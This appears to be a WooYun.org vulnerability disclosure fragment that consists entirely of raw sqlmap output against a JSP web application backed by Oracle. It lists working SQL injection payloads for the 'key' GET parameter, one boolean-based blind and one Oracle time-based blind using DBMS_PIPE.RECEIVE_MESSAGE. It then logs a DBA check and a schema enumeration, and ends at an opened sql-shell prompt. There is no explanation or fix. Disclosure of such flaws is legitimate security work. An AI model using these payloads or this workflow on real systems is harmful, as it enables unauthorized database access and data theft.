WooYun.org

---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=-1' AND 2739=2739 AND 'jSlJ'='jSlJ&method=get&typeId=1
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: key=-1' AND 6137=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(117)||CHR(81)||CHR(107),5) AND 'AjJs'='AjJs&method=get&typeId=1
---
[12:49:40] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

web application technology: JSP
back-end DBMS: Oracle
[22:42:14] [INFO] testing if current user is DBA
[22:42:14] [WARNING] reflective value(s) found and filtering out
[22:42:14] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[22:42:14] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[22:42:14] [INFO] fetching database (schema) names
[22:42:14] [INFO] fetching number of databases
[22:42:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:42:14] [INFO] retrieved: 
[22:42:15] [WARNING] time-based comparison requires larger statistical model, please wait..........................
[22:42:27] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[22:42:28] [ERROR] unable to retrieve the number of databases
[22:42:28] [INFO] falling back to current database
[22:42:28] [INFO] fetching current database
[22:42:28] [INFO] resumed: !
[22:42:28] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
available databases [1]:
[*] !
[22:42:28] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER
sql-shell>